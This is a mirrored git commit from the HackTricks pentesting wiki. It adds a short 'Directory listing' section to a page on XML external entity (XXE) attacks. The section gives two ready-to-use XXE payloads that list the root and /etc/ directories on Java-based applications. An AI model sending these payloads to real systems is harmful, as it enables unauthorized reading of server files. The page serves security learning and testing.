mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
GitBook: [master] one page modified
This commit is contained in:
parent
76100d0b06
commit
77754cb2d9
1 changed files with 12 additions and 0 deletions
|
@ -119,6 +119,18 @@ In this third case notice we are declaring the `Element stockCheck` as ANY
|
|||
|
||||
![](../.gitbook/assets/image%20%2832%29.png)
|
||||
|
||||
### Directory listing
|
||||
|
||||
In **java** based applications it might be possible to **list the contents of a directory** via XXE with a payload like:
|
||||
|
||||
```markup
|
||||
<!-- Root / -->
|
||||
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>
|
||||
|
||||
<!-- /etc/ -->
|
||||
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]><root><foo>&xxe;</foo></root>
|
||||
```
|
||||
|
||||
### SSRF
|
||||
|
||||
An XXE could also bu used to abuse a SSRF inside a cloud
|
||||
|
|
Loading…
Reference in a new issue